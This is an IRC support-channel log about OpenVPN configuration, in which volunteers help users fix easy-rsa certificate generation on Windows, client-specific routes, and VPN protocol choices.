06:37 < Dashers> Personally I use LAN:192.168 -> Server <-VPN 10.8 -> Server <- Another LAN 172.16
06:37 < Dashers> Yeah, you're just routing networks
06:38 < Dashers> Providing that the other devices have the route for your VPN then it should all be funky
06:42 < julius_> of what other devices do you speak?
06:42 < julius_> for now i only need one client being able to communicate over the server
07:03 < julius_> Dashers, in my case i also needed the nat
08:01 < manitu> someone with voice here wrote that openvpn extension for filtering and access management if i understood it right.. does someone have the project name?
08:42 < Holiday> !welcome
08:42 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
08:42 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
09:20 < Burgundy> Hello! This is my routing table in the VM I'm playing with: http://pastie.org/6012513. The two 10.8.x.x connections are VPN connections and, according to the routing rules I'd expect traffic to go through the 10.8.0.2 interface, however it seems that traffic goes through 10.8.3.2, disregarding the higher metric. What am I missing?
09:37 < Holiday> !howto
09:37 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
09:39 < Holiday> Question. Myself and a co-worker are looking to deploy a departmental VPN so we don't have to use the one provided by the main organization. So far we have an IPsec/L2TP VPN "mostly" working on RedHat (using OpenSwan and XL2TPD) but I've been told by the people in the openswan channel the way he's trying to do it requires a special config
09:41 < Holiday> issue is, I can't seem to find any more help than that (No guides online etc). I'm curious if OpenVPN would work any easier. The VPN server has dual interfaces (xxx.88.5 and xxx.88.120).
We want to use eth1 (88.120) for the in and out of the VPN, but he also wants to avoid any NAT'ing or MASQ if possible while keeping the *client* machines also in a range of xxx.88.127 to xxx.88.145
09:42 < Holiday> Is that manageable with OpenVPN, or just as difficult as if we used OpenSwan (One reason I'm really pushing for OpenVPN is even though he wants to keep the setup simple for the clients, such as using the built-in VPN clients, it just seems like each client requires its own tweaks within the config for OpenSwan and makes it rather annoying)
09:45 < shadoom> is this the right place to ask stuff about the android openvpn connector ?:D
10:02 < hg_5> hello if i set this path in openvpn vars.bat set HOME=C:\openvpn\easy-rsa it doesn't find it
10:02 < hg_5> what is the proper path in this line?
12:25 < hg_5> anyone there?
12:28 <@ecrist> !ask
12:28 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc
12:29 <@ecrist> hg_5: you need to escape the backslash
12:29 < hg_5> ecrist what?
12:29 <@ecrist> set HOME="C:\\openvpn\\easy-rsa"
12:29 < hg_5> double backslash???
12:29 <@ecrist> yes
12:29 <@ecrist> a backslash is typically an escape character
12:32 <@ecrist> hg_5: that syntax is in the manual and the howto, btw
12:39 < hg_5> ecrist and i still have a problem: http://puu.sh/1VUeE (System cannot find the specified path)
12:40 < hg_5> my vars.bat file looks like that: http://pastebin.com/gXntHM8V
12:41 <@ecrist> oh, I didn't realize this was a batch script
12:41 <@ecrist> remove the double slashes, but keep the quotes
12:45 < hg_5> and still the same http://puu.sh/1VUpx (System cannot find the specified path)
12:57 < hg_5> ecrist you know what is going on?
13:07 <+pekster> hg_5: No quotes in that since it's windows batch
13:07 <+pekster> hg_5: Syntax should be as follows: set HOME=C:\openvpn\easy-rsa
13:07 < hg_5> pekster i have tried with no quotes at the beginning, but had the same, didn't work
13:07 <+pekster> (assuming you moved the entire easy-rsa directory to that path, including all the support files that shipped with the openvpn distribution)
13:08 <+pekster> hg_5: And you re-ran "vars.bat" after setting the path to the place where you're keeping easy-rsa?
13:09 < hg_5> pekster, yes look http://puu.sh/1VV0g
13:10 < hg_5> what do you mean "re-ran vars.bat" ?
13:11 <+pekster> After you update the code on line 6 to point to your correct path, you must *then* run 'vars' or it will use the old (default on installation) path
13:11 <+pekster> You did it in that order, right?
13:13 < hg_5> ohh, i didn't run vars.bat
13:13 <+pekster> Yea, that file just sets the environmental variables
13:14 <+pekster> All the scripts require those variables set correctly to work
13:14 <+pekster> So, *every* time you open a new command window (or change vars.bat) you must run it again to update the variables
13:14 < hg_5> ok i ran vars.bat, but i still get the same "system cannot find the specified path" after clean-all command
13:15 <+pekster> hg_5: Oh, KEY_DIR=keys
13:15 <+pekster> It's a relative path, not absolute
13:15 <+pekster> hg_5: Same with your KEY_CONFIG
13:16 <+pekster> That needs to be openssl-1.0.0.cnf
13:16 <+pekster> It's all relative to your %HOME%
13:25 < hg_5> pekster ehh still the same problem, it didn't help
13:26 < hg_5> http://puu.sh/1VVqu
13:26 <+pekster> You didn't re-run vars from the look of it
13:26 <+pekster> Look at your cmd history
13:27 <+pekster> You copy the sample file in (presumably needing to fix it up first) and then run clean-all. It fails. Then you run it again. Of course it'll fail because nothing has changed in the environment
13:27 * ecrist cannot wait to revamp that miserable piece of software
13:28 <+pekster> ecrist: Yea, it's a bit worse for the Windows side (missing scripts to sign without building a key, etc. I'll be happy to see it go. That patch was just a band-aid really)
13:29 <+pekster> I haven't looked at the new replacement as I've had my own personal scripts for a while that do exactly what I like
13:30 <@ecrist> there's no replacement yet, but it's going to operate much like ssl-admin does now, with batch capabilities
13:31 <+pekster> Ah, k. Yea, ssl-admin was the name I was thinking of.
Either way, I just started a system from scratch, and I like it.
13:32 <@ecrist> :)
13:32 <+pekster> But I'm picky about how my certs work
13:33 < hg_5> pekster when i ran "vars" command, after that i deleted vars.bat and copied my vars.bat
13:34 <+pekster> hg_5: Unless I'm missing command history in that screenshot, you ran clean-all twice without running 'vars' again. That doesn't work. A different cmd window has its own environment
13:34 < hg_5> i just wanted to check if i get the same error
13:34 < hg_5> that's why i ran it twice
13:35 <+pekster> Between the "copy vars.bat.sample vars.bat" step and "vars" command, did you update the file to look like your Notepad++ screenshot shows?
13:35 <+pekster> It's crucial that you did, because otherwise that error is quite expected
13:36 <+pekster> hg_5: Oh, no quotes on line 7
13:36 <+pekster> batch treats quotes as a literal quote character
13:36 <+pekster> (which aren't allowed in filenames anyway)
13:36 <+pekster> (yes, MS batch is stupid)
13:43 < hg_5> can you look, i will stream what i am doing?
13:43 < hg_5> www.justin.tv/ryyyiu
13:44 <+pekster> http://puu.sh/1VVqu fix line 7
13:44 <+pekster> No " character
13:44 < hg_5> i have fixed it
13:44 <+pekster> re-sourced vars?
No need to keep running init-config
13:45 <+pekster> Stop copying the vars.bat.sample too
13:45 <+pekster> Just fix your vars, run 'vars' in a console, and 'clean-all' will delete and re-create the 'keys' directory and copy in index.txt.start and serial.start to the keys dir
13:45 < hg_5> oh it works now ;'
13:47 < hg_5> hm what's that error http://puu.sh/1VW0z
13:48 < hg_5> and this in the same command (build-key client1) http://puu.sh/1VW1Q
13:48 < hg_5> pekser?
13:48 < hg_5> pekster
14:01 <+pekster> hg_5: Sounds like you have a non-unique CN perhaps? https://community.openvpn.net/openvpn/ticket/229#no1
14:01 <@vpnHelper> Title: #229 (easy-rsa: failed to update database > TXT_DB error number 2) – OpenVPN Community (at community.openvpn.net)
14:02 < hg_5> pekster if i re-try this process on a virtual machine with a fresh windows installation, will it work?
14:03 <+pekster> It should.
Or just re-install openvpn and use a fresh easy-rsa copy
14:03 <+pekster> (if you have an un-modified pristine version it should work too)
14:03 <+pekster> The scripts especially for windows are really, really, basic
14:04 <+pekster> The Linux version does a bit more behind-the-scenes work, but the Windows batch are about the most simple you can get
14:04 <+pekster> I'm betting either your CNs aren't unique, or that you somehow clobbered your serial file
14:05 <+pekster> Without context there's really no way to know
14:10 < kothog> I have a working OpenVPN server using certificates. In the client config files (named after the certs) I have the directives for pushing routes (Works fine.) I have iroute (works fine) but I also have "route 10.10.11.0 255.255.255.0 10.0.0.20" where 10.0.0.20 is the client's openvpn ip address and 10.10.11.0/24 is the subnet *on the client*. I want the server to automatically add the routes when the client connects, and destroy them when the client dis
14:17 <+pekster> kothog: That's doable, yea. You're missing splitlong.pl or such because it got cut off after "destroy them when the client dis" ...
14:17 < kothog> oh woops. :)
14:17 < kothog> connects. Is this possible?
14:17 < kothog> ^^ the rest of the line.
14:17 < kothog> pekster: Thanks for the reminder, also.
14:17 <+pekster> Ah, okay. That much I inferred. Yea, you can use 'route' inside a ccd like that
14:18 < kothog> hrm. in that case either the config file isn't being read, or something on the system is interfering with the ability to add routes.
14:19 <+pekster> Downgrading permission perhaps?
14:19 <@krzee> you dropping permissions?
14:19 <@krzee> damn, beat me to it!
14:19 * pekster wins this round
14:19 < kothog> good idea I'll check
14:19 <+pekster> About time I win one ;)
14:19 < kothog> ps auxww | grep -i openvpn
14:19 < kothog> root 1433
14:19 <+pekster> What's the log say?
14:19 <+pekster> I think at verb 3 it should tell you even if successful, but maybe you need 'verb 4' for that
14:19 <+pekster> You should get errors regardless
14:20 <@krzee> i'd say always verb 4 while debugging, unless firewall can possibly be an issue, then verb 5
14:20 <+pekster> Yea. verb 4 is better since it's more talkative when processing the ccd files
14:20 <+pekster> Okay, time for afternoon coffee. My typing is getting worse...
14:21 <@krzee> i'm putting up fencing today while sick… bout ready to die
14:21 < kothog> It's running at verb 4. No errors at the moment relating to routes. The last message it reports for that client when it connects is SENT CONTROL [Venn_VPN]: 'PUSH_REPLY,route {etc}
14:22 < kothog> so, TLS verifying okay, data channel encrypt.. Control Channel message, PUSH: Received control message: 'PUSH_REQUEST', send_push_reply(): safe_cap=960, and then: SENT CONTROL [Venn_VPN]: 'PUSH_REPLY,route {etc}
14:25 < kothog> whoah, there we go.
14:26 < kothog> lots of debugging info.
14:26 < Maverick0984> anyone had any success in using OpenVPN GUI with PhoneFactor or similar?
14:26 < Maverick0984> OpenVPN GUI times out the authentication before the call can be made
14:27 < kothog> OPTIONS IMPORT: reading client specific options from: /et
14:27 < kothog> c/openvpn/clients/err..
14:27 < kothog> OPTIONS IMPORT: reading client specific options from: /etc/openvpn/clients/Venn_VPN, then: Options error: option 'route' cannot be used in this context
14:27 < kothog> aaaargh
14:40 < rrva> hi! If I turn off encryption, will the authentication still be safe from eavesdropping? I use a static key
14:41 <+pekster> There is no authentication with static keys (ie: using --secret.) Ownership of the key is considered proof that the peer is authorized
14:48 < rrva> yes, but I mean, is there something protecting the static key from being eavesdropped? And if so, will that protection be turned off if I turn off encryption?
14:48 <+pekster> The static key is never sent over the wire
14:48 <+pekster> Turning off encryption in a static keyed setup is pointless. Use a GRE tunnel if that's what you want
14:48 < rrva> ah ok it is just a shared secret
14:49 < rrva> does tomato router support gre?
14:49 <+pekster> Any Linux will, yea
14:49 < rrva> i just need a tunnel only usable by me, but i do not need encryption
14:49 <+pekster> 'man ip-tunnel' for that then
14:50 < rrva> oh ok
14:50 <+pekster> OpenVPN is designed around the premise of using openssl for encryption
14:53 < kothog> Huh. Guess 'route' can't be used inside a ccd after all.
14:54 <+pekster> Hmm, I thought it could. manpage doesn't list it though, so I'm likely mistaken
14:54 < kothog> pekster: Which manpage are you looking at?
14:55 <+pekster> 2.3.0
14:55 <+pekster> Same for 2.2.2
14:55 < kothog> When you say it doesn't "list" it though, is there a list of commands that can be used in a ccd?
14:56 <+pekster> See --client-config-dir
14:56 <+pekster> !man
14:56 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
14:56 < kothog> okay thanks! well I certainly appreciate the help.
14:57 <+pekster> Sorry to have led you down the wrong path. I thought you could do that, but apparently not. You could probably work some magic into a --client-connect & --client-disconnect script to do it too, although that's more work
14:57 < kothog> ah HAH: "The following options are legal in a client-specific context"
14:58 < kothog> yeah no worries, it made me learn quite a bit more about openvpn tracing it down, and in my experience that's never a bad thing. :)
14:58 -!- gajop [~gajop@unaffiliated/gajop] has joined #openvpn
14:58 <+pekster> Did the log actually complain about it?
14:58 < kothog> pekster: Yeah it turns out it was complaining about it, but it had been running for so long that syslog had rotated those initial config errors right out of the way
14:58 < gajop> so.. i don't have the CA cert of my uni's VPN, how can i obtain it if i know its address so openvpn doesn't complain?
14:58 < kothog> so when I restarted it, the errors showed up again.
14:58 <+pekster> Ah, gotcha :)
14:58 < gajop> .. can openvpn even be used for work VPNs?
14:59 <+pekster> gajop: Sure, openvpn is GPL, so as long as they aren't reselling the software without providing the source to customers, it's completely legal. https://www.gnu.org/licenses/gpl-2.0
14:59 <@vpnHelper> Title: GNU General Public License v2.0 - GNU Project - Free Software Foundation (at www.gnu.org)
15:00 <+pekster> As for the CA cert, they should publish that somewhere online, sometimes in a release package, or sometimes by itself. It's non-trivial to "obtain" it from a running service if you don't have it
15:01 <+pekster> openssl's s_client might be able to hack something if it's a TCP server, but the more-common UDP mode is even harder to swipe the cert. Maybe you could use a fake ca locally and wireshark/tcpdump the traffic and rip out the x509 from the data stream
15:01 < gajop> pekster: what? no, that's not what i asked; i'm wondering if i can use the openvpn client to connect to the work network, not sure what's the difference if any between "regular vpn" you can create in MS windows and openvpn
15:01 <+pekster> OpenVPN uses its own protocol
15:01 < gajop> ok so nvm then :p
15:01 <+pekster> It's not IPSec or PPTP or L2TP or any of that
15:02 < gajop> they aren't very technical, but i think they're using ppp over ip
15:02 <+pekster> Not very secure then :)
15:03 <+pekster> PPTP is also basically broken completely as of 2012
15:03 <+pekster> (it's been known to be very weak for a decade prior to that, so anyone using it has had their head buried in the sand for a while)
15:03 < gajop> honestly don't care, i just need to access some articles and i need to be on the uni network for that :p
15:03 <+pekster> Right
15:04 <+pekster> Yea, openvpn only talks to another openvpn peer
15:04 <+pekster> And it speaks the openvpn protocol to do so ;)
15:04 < gajop> yeh, ok, i did use it before with friends; guess i'll need to configure this broken pppd for work ;/
15:05 <+pekster> In TLS modes (ie: server/multi-client mode, or 'mode server') there's a standard TLS-handshake, but the data is multiplexed on top of the same network socket
15:05 <@krzee> !pptp
15:05 <@vpnHelper> "pptp" is (#1) PPTP is known to be a faulty protocol. The designers of the protocol, Microsoft, recommend not to use it due to the inherent risks. Lots of people use PPTP anyway due to ease of use, but that doesn't mean it is any less hazardous. The maintainers of PPTP Client and Poptop recommend using OpenVPN (SSL based) or IPSec instead. http://pptpclient.sourceforge.net/protocol-security.phtml to
15:05 <@vpnHelper> read about why to not use pptp or (#2) Why not to use it: http://en.wikipedia.org/wiki/Pptp#Security or (#3) https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/
15:05 <@krzee> (for more info on what pekster said)
15:06 <+pekster> How come no one listens to B. Schneier until someone actually breaks a protocol? :(
15:06 <@krzee> no kidding
15:06 <@krzee> hell even microsoft once said it was broken
15:06 <+pekster> Well, not until last year
15:06 <+pekster> (after the moxie break)
15:06 <@krzee> nah they said it long ago
15:06 < neilhwatson> Don't they always plug their ears and yell LA! LA! LA! until it's cracked?
15:07 <@krzee> referenced here long before moxie http://pptpclient.sourceforge.net/protocol-security.phtml
15:07 <@vpnHelper> Title: PPTP Client (at pptpclient.sourceforge.net)
15:07 < gajop> yeh.. well mail it to my uni's network admins, also mind telling them to use some form of SSL for pop3/imap?
15:07 <+pekster> Basically. They "recommended" L2TP when that came out, but they didn't exactly push people off pptp very well
15:08 <+pekster> There are still lots of corp shops using it. Many of those still accept MS-CHAPv1 too ;)
15:08 < neilhwatson> Careful gajop, more draconian unis might see your actions as hacking if you are trial-and-erroring a third party vpn client.
15:09 <+pekster> Downgrade attacks anyone? On that note, go check your openvpn installations for --tls-cipher if you want a hardened setup
15:09 <@krzee> yes, you may want to get permission first
15:10 < gajop> unlikely, i teach there and know most of the admins by name;
15:10 <+pekster> Oh, actually the ovpn peer won't present the CA, just its own cert. I don't think openvpn allows you to use --ca with a non-CA-signed cert
15:10 <+pekster> So, you're hosed unless you 1) get the proper CA cert or 2) patch openvpn to connect anyway (which is REALLY REALLY insecure)
15:10 <@krzee> right
15:11 <@krzee> you're actually able to use split CAs, not that i can find a reason to do it
15:11 -!- nickanderson_afk is now known as nickanderson
15:11 <@krzee> with servers using 1 CA and clients using another
15:11 <+pekster> Sure, but each side still needs the CA of the other peer's cert
15:11 <@krzee> as long as each side has the other's ca.crt
15:11 <@krzee> yes
15:11 <+pekster> That might be more useful in a sub-CA setup
15:11 <@krzee> otherwise you dunno who the other side is, or that they are who they say
15:12 <+pekster> ie: rootCA -> [intermediate_serverCA & intermediate_clientCA ] -> client certs
15:12 -!- gajop [~gajop@unaffiliated/gajop] has left #openvpn ["WeeChat 0.4.0"]
15:12 <+pekster> s/client/peer/
15:12 <@krzee> would there be a point?
15:12 <+pekster> Not really. Maybe keep the server intermediate offline
15:13 <@krzee> lol EugeneKay nice hostname
15:14 <+EugeneKay> krzee - check the matching website ;-)
15:14 <@krzee> lol
15:14 -!- exed [~maximus@ppp-46-244-149-179.dynamic.mnet-online.de] has quit [Quit: exed]
15:14 <@krzee> nice neckbeard!
15:14 <@krzee> :-D
15:14 <+EugeneKay> That's an old pic. I haven't bothered to update it since I became a firefighter
15:15 <+EugeneKay> I shave at least every other day now
15:18 <+EugeneKay> krzee - you should see my collection of stupid hostmasks
15:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
15:24 -!- `Ile` [~ile@109-92-65-39.dynamic.isp.telekom.rs] has joined #openvpn
15:28 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds]
15:32 < Maverick0984> so does anyone know of a way to delay the authentication timeout? for something like a phone call two-factor setup?
15:32 < Maverick0984> any sort of entry in the config that would accomplish this?
15:34 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
15:34 -!- `Ile` [~ile@109-92-65-39.dynamic.isp.telekom.rs] has quit [Quit: leaving]
15:38 < hg_5> ehh what's wrong come on, i'm trying this on windows xp fresh installed http://puu.sh/1VZn7
15:42 < hg_5> pekster maybe you know ;' ?
15:48 < hg_5> i have installed openvpn 2.3 (32bit version) and i can't find where openssl.cfg is
15:48 -!- u0m3 [~Radu@92.80.92.99] has quit [Read error: Connection reset by peer]
15:49 -!- Eagleman7 [~Eagleman@5.45.183.189] has joined #openvpn
15:50 < hg_5> do i have to download and install openssl separately or what hm?
15:50 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
15:51 -!- Eagleman [~Eagleman@5.45.183.189] has quit [Ping timeout: 245 seconds]
15:52 -!- u0m3 [~Radu@92.80.123.64] has joined #openvpn
15:56 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 245 seconds]
15:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
16:01 < Eagleman7> Does each instance (udp/tcp) need its own chroot directory or can they share the chroot dir?
16:01 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.]
16:02 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
16:03 -!- nickanderson is now known as nickanderson_afk
16:05 -!- Eagleman7 [~Eagleman@5.45.183.189] has quit [Ping timeout: 248 seconds]
16:08 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
16:09 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn
16:11 <+pekster> hg_5: that error is unimportant since the KEY_CONFIG is what gets passed instead
16:12 <+pekster> If you incorrectly referenced that relative to your %HOME% variable, easy-rsa doesn't work
16:12 <+pekster> If you don't have openssl in your %PATH% easy-rsa won't work
16:12 < hg_5> pekster, ;o finally got it to work, i have downloaded and installed http://slproweb.com/download/Win64OpenSSL-1_0_1c.exe
16:12 < hg_5> then took openssl.cfg from there and moved it to the openvpn folder
16:12 <+pekster> That will cause you problems unless you patched the cnf file to be openvpn-friendly
16:13 <+pekster> Unless you don't use MITM protection, in which case your VPN isn't as secure as it should be
16:13 <+pekster> See:
16:13 <+pekster> !mitm
16:13 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config
16:13 < hg_5> then i used this command in command prompt set OPENSSL_CONF=c:\[PATH TO YOUR OPENSSL DIRECTORY]\bin\openssl.cfg
16:14 -!- rrva [unknown@y.mima.x.se] has quit [Quit: Lost terminal]
16:14 < hg_5> MITM protection?
16:14 <+pekster> hg_5: Read the link. Ask after if you still don't get it
16:14 <+pekster> Also, note that build-key.bat and most of the other scripts specifically use -config %KEY_CONFIG%
16:14 <+pekster> So, copying in a stock openssl.cnf file won't build server certs properly
16:15 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
16:15 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
16:15 <+pekster> It'll probably break, actually, since the -extensions server won't exist
16:15 <+pekster> (this is why openvpn ships with its own openssl.cnf file)
16:19 < hg_5> pekster one more error http://puu.sh/1W0HM
16:19 < hg_5> what is the problem?
16:19 < hg_5> i got only this error now
16:20 < hg_5> pekster i meant openssl.cfg not openssl.cnf
16:20 <+pekster> Same thing
16:20 <+pekster> It's the "openssl configuration file"
16:20 < hg_5> this process requires openssl.cfg
16:20 < hg_5> so i can change openssl.cnf to openssl.cfg?
16:20 <+pekster> Then you named it like that in vars.bat
16:20 <+pekster> You can name it unicorn.jpg for all it matters
16:21 <+pekster> You need to reference it properly in the scripts that use the config file
16:21 <+pekster> If you've failed to reference it correctly, or failed to use the openvpn-specific configuration, or some combination of the above, stuff won't work
16:22 <+pekster> This is why it's easiest to just run easy-rsa from the installed path that OpenVPN puts itself in when you install. You're "managing everything yourself" if you move the directory like you've done, and it's implicitly assumed you have a good idea how openssl and easy-rsa work to do it
16:22 < hg_5> pekster i told you i have installed openvpn 2.3 on a fresh new system (windows xp 32bit)
16:23 < hg_5> and i redid the whole process and still got errors ...
16:23 <+pekster> Using it from C:\program files\openvpn\easy-rsa ?
16:23 < hg_5> yes!
16:23 < hg_5> and on a fresh new system got this error ;o can't open config file /etc/ssl/openssl.cnf
16:24 < hg_5> so..................
16:24 <+pekster> It's a warning, not an error
16:24 <+pekster> It's just looking in the "default place" for that file and not finding it
16:24 <+pekster> Assuming the scripts haven't been altered to lack the "-config %KEY_CONFIG%" part, it's using the one from vars.bat
16:25 <+pekster> I'll double-check everything works in my XP VM using 2.3.0, but it should...
16:26 < hg_5> pekster can you pastebin vars.bat.sample ?
16:27 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 252 seconds]
16:28 <+pekster> hg_5: Stock vars.bat.sample in a 2.3.0 (32-bit) install on XP: http://fpaste.org/G3Ji/
16:28 < hg_5> yes i have this also, same stock
16:29 <+pekster> Works fine for me. If I make no changes to the vars.bat file and run it, as long as my CN is unique
16:30 <+pekster> I can successfully reproduce your error if you use the same cert CN
16:30 <+pekster> You are not allowed to do that
16:30 <+pekster> Don't do it
16:30 < hg_5> i have made changes in vars.bat from line 31 to 40, but it's obvious i had to
16:30 <+pekster> I already noted this earlier
16:30 < hg_5> what is cert CN ?
16:30 < kothog> pekster: So I have a little script going which builds a filename from the CN of the cert and I have the static routes working just fine via the connect-client generic script (differentiating routes inside the script via the passed env variable "$common_name") So, thanks for the suggestion, that was superbly helpful.
16:30 < kothog> \o
16:31 < hg_5> and how have you reproduced this error?
16:31 <+pekster> hg_5: Follow the directions in the howto better next time. When you create your cert it asks you the "Common Name". These *MUST* *NOT* match a currently valid cert
16:31 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit []
16:31 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
16:31 < hg_5> ahhh
16:31 <+pekster> kothog: Yup. When you can't do what you want, write code to do it
16:33 < hg_5> so KEY_CN must not be the same as KEY_OU ?
16:33 <+pekster> Don't ever set KEY_CN yourself
16:33 <+pekster> Ever
16:33 <+pekster> I mean, it's fine in the vars.bat file
16:33 <+pekster> But the scripts take care of that. You must CHANGE it. This is why it says "changeme"
16:33 < hg_5> "set KEY_CN=changeme" ;o?
16:34 < hg_5> ohh ok
16:34 <+pekster> This is also *very* clearly explained in the howto. Please go back and read it. Then read it again. Then do what it tells you
16:34 <+pekster> !howto
16:34 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
16:34 < kothog> pekster: I was getting into my time-wasting "stubborn" mode and about to modify openvpn source to allow route within a client config context, but the script method is much easier. lol
16:35 <+pekster> Yea. I don't know why it isn't supported, but I suppose you'd need to handle the odd case where someone edited the ccd file between client connect and client disconnect, and that's some ugly programmatic changes
16:35 <+pekster> Easier to just give the user script hooks if one wants to do something out of the ordinary
16:35 <+pekster> kothog: Usually I just have the server get a 'route' statement in the main configuration to supernet any downstream client LANs I use
16:35 <+pekster> But, maybe your use-case is different, or can't be (easily) supernetted
16:40 < hg_5> pekster, hm and what about this error, can you reproduce it http://puu.sh/1W1jM ?
16:40 <+pekster> That's because your CN matches
16:40 <+pekster> Don't use a CN you've issued a cert for before
16:41 <+pekster> In case you somehow forgot to read the link I've asked you to (twice) this should make it painfully obvious:
16:41 <+pekster> "Remember that for each client, make sure to type the appropriate Common Name when prompted, i.e. "client1", "client2", or "client3". Always use a unique common name for each client."
16:41 <+pekster> If you fail to do that, openssl will fail to issue your cert. You can hack openssl.cnf to allow it anyway, but I'm not going to help you do that as it's very bad practice. The openssl documentation can explain how if you really want to do this
16:42 < hg_5> ahhhh....
16:42 <+pekster> Now please stop asking for help without reading the links I send. It makes me not interested in helping you in the future
16:45 < hg_5> thankss....... it works now! ahhh there should be a simpler way to generate those certificates ;p
16:46 <+pekster> You mean the way the official documentation tells you to? Yes, yes it would.
16:46 < hg_5> you know some gui, that i click generate certificate and it generates ;d
16:46 <+pekster> !xca
16:46 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. or (#2) Example XCA PKI for OpenVPN(writeup pending): https://community.openvpn.net/openvpn/wiki/XCA
16:47 < kothog> pekster: Each client connecting is home to a number of subnets, not all of them necessarily related to one another, and all admin'd by different people, so we're using openvpn as a sort of hub-node to talk to each other.
16:47 <+pekster> You're free to use whatever method you like. Those aren't supported in the 'official' howto. If you aren't familiar with openssl (no offence, but you really aren't given this problem) then using unofficial tools can cause problems if you don't understand how they work
16:47 < hg_5> wow i didn't hear about this :D
16:47 <+pekster> I wrote my own CA management from scratch using bash. Then again, I know what I'm doing
16:48 <+pekster> kothog: Yea, I see. Either a bunch of disjoint routes in your server.cnf, or handle it on each node. Of course, pushing the routes to each node is problematic, unless you have magic to handle that on the backend too. And making sure routes don't collide is always fun when it's different people/groups maintaining them :P
16:49 <+pekster> Erm, server.conf*
16:50 -!- Eagleman [~Eagleman@5.45.183.189] has joined #openvpn
16:51 < kothog> pekster: Client-to-client routing is working via push routes, and iroute (I think iroutes are necessary), and then there are services on the server-side that the downstream subnets want to be able to access too. It's really our own fault for doing things so complicated. Some day I'd like to see a many:many participant openvpn that doesn't need the hub, and only requires one openvpn binary, but honestly if I'm not going to write it myself I don't have
16:51 < kothog> much business complaining. :) So I'm happy with our little frankenstein of a configuration.
16:51 < kothog> yeah, colliding routes, for sure.
16:55 <+pekster> Yup. With multi-threading, many:many might become an option since the TLS backend to identify clients uniquely is half the battle
16:55 <+pekster> Anyway, I'm out
16:55 -!- mode/#openvpn [-v pekster] by ChanServ
17:00 -!- adolfomaltez [~taro@190.62.211.253] has joined #openvpn
17:01 -!- gbkersey [~gbkersey@cpe-70-113-93-142.austin.res.rr.com] has quit [Ping timeout: 252 seconds]
17:03 -!- gbkersey [~gbkersey@cpe-70-113-93-142.austin.res.rr.com] has joined #openvpn
17:16 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has quit [Ping timeout: 256 seconds]
17:19 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
17:35 -!- Eagleman [~Eagleman@5.45.183.189] has quit []
17:46 -!- gbkersey [~gbkersey@cpe-70-113-93-142.austin.res.rr.com] has left #openvpn ["Leaving"]
17:55 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn
17:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
17:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
17:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
18:04 -!- oyunokata [~rrinehart@209.163.177.130] has quit [Ping timeout: 252 seconds]
18:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
18:16 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
18:16 -!- mode/#openvpn [+o krzee] by ChanServ
18:21 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
18:23 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
18:33 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
18:40 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.]
18:44 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds]
